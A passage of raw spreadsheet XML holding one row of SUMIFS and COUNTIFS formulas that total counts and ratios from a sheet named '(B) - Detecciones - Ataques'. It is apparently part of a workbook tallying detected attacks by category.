        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>17</v>
      </c>
      <c r="AC65" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>2</v>
      </c>
      <c r="AD65" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="AE65" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="AF65" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>461</v>
      </c>
      <c r="AG65" s="271"/>
      <c r="AH65" s="352" t="s">
        <v>2532</v>
      </c>
      <c r="AI65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>23</v>
      </c>
      <c r="AJ65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>0</v>
      </c>
      <c r="AL65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>105</v>
      </c>
      <c r="AR65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>1</v>
      </c>
      <c r="AS65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>0</v>
      </c>
      <c r="AU65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>2</v>
      </c>
      <c r="AV65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>0</v>
      </c>
      <c r="AW65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>16</v>
      </c>
      <c r="AY65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>1</v>
      </c>
      <c r="BA65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>0</v>
      </c>
      <c r="BD65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>0</v>
      </c>
      <c r="BI65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>566</v>
      </c>
      <c r="BN65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>2</v>
      </c>
      <c r="BO65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>2</v>
      </c>
      <c r="BT65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>0</v>
      </c>
      <c r="BZ65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>0</v>
      </c>
      <c r="CA65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>1</v>
      </c>
      <c r="CG65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>0</v>
      </c>
      <c r="CI65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>1</v>
      </c>
      <c r="CL65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>0</v>
      </c>
      <c r="CN65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>1</v>
      </c>
      <c r="CP65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>1</v>
      </c>
      <c r="CQ65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>6</v>
      </c>
      <c r="CU65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>0</v>
      </c>
      <c r="CZ65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>0</v>
      </c>
      <c r="DE65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>5</v>
      </c>
      <c r="DF65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>450</v>
      </c>
      <c r="DI65" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ65" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>11</v>
      </c>
      <c r="DK65" s="271"/>
      <c r="DO65" s="279"/>
      <c r="DP65" s="271"/>
      <c r="DQ65" s="271"/>
      <c r="DR65" s="271"/>
      <c r="DS65" s="271"/>
      <c r="DT65" s="271"/>
      <c r="DU65" s="271"/>
      <c r="DV65" s="271"/>
      <c r="DW65" s="271"/>
      <c r="DX65" s="271"/>
      <c r="DY65" s="271"/>
      <c r="DZ65" s="271"/>
      <c r="EA65" s="271"/>
      <c r="EB65" s="271"/>
      <c r="EC65" s="271"/>
      <c r="ED65" s="280"/>
      <c r="EG65" s="279"/>
      <c r="EH65" s="271"/>
      <c r="EI65" s="435" t="s">
        <v>2488</v>
      </c>
      <c r="EJ65" s="427">
        <f t="shared" ref="EJ65:EM65" si="60">EJ64/EJ43</f>
        <v>0.152173913</v>
      </c>
      <c r="EK65" s="427">
        <f t="shared" si="60"/>
        <v>0.347826087</v>
      </c>
      <c r="EL65" s="427">
        <f t="shared" si="60"/>
        <v>0.3310810811</v>
      </c>
      <c r="EM65" s="427">
        <f t="shared" si="60"/>
        <v>0.1832061069</v>
      </c>
      <c r="EN65" s="441"/>
      <c r="EO65" s="271"/>
      <c r="EP65" s="271"/>
      <c r="EQ65" s="483"/>
      <c r="ER65" s="478"/>
      <c r="ES65" s="478"/>
      <c r="ET65" s="478"/>
      <c r="EU65" s="478"/>
      <c r="EV65" s="478"/>
      <c r="EW65" s="478"/>
      <c r="EX65" s="478"/>
      <c r="EY65" s="478"/>
      <c r="EZ65" s="478"/>
      <c r="FA65" s="479"/>
      <c r="FD65" s="480"/>
      <c r="FG65" s="491" t="s">
        <v>6</v>
      </c>
      <c r="FH65" s="69">
        <v>0.0</v>
      </c>
      <c r="FI65" s="368">
        <f>EJ66</f>
        <v>0.847826087</v>
      </c>
      <c r="FM65" s="480"/>
      <c r="FN65" s="480"/>
      <c r="FO65" s="480"/>
      <c r="FP65" s="480"/>
      <c r="FQ65" s="480"/>
      <c r="FR65" s="480"/>
      <c r="FS65" s="480"/>
      <c r="FT65" s="480"/>
      <c r="FU65" s="480"/>
      <c r="FV65" s="480"/>
      <c r="FW65" s="480"/>
      <c r="FX65" s="480"/>
      <c r="FY65" s="379" t="s">
        <v>2093</v>
      </c>
      <c r="FZ65" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY48)+SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY48 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY48)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY48 &amp; "*"))</f>
        <v>0.1684561575</v>
      </c>
      <c r="GA65" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY48)+SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY48 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY48)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY48 &amp; "*"))</f>
        <v>0.3333333333</v>
      </c>
      <c r="GB65" s="480"/>
      <c r="GC65" s="379" t="s">
        <v>2093</v>
      </c>
      <c r="GD65" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY48)+SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY48 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY48)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY48 &amp; "*"))</f>
        <v>0.3351228241</v>
      </c>
      <c r="GE65" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY48)+SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY48 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY48)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY48 &amp; "*"))</f>
        <v>0.5</v>
      </c>
      <c r="GF65" s="480"/>
      <c r="GG65" s="480"/>
      <c r="GH65" s="480"/>
      <c r="GI65" s="480"/>
      <c r="GJ65" s="480"/>
      <c r="GK65" s="480"/>
      <c r="GL65" s="480"/>
      <c r="GM65" s="480"/>
      <c r="GN65" s="480"/>
      <c r="GO65" s="480"/>
      <c r="GP65" s="480"/>
      <c r="GQ65" s="480"/>
      <c r="GR65" s="480"/>
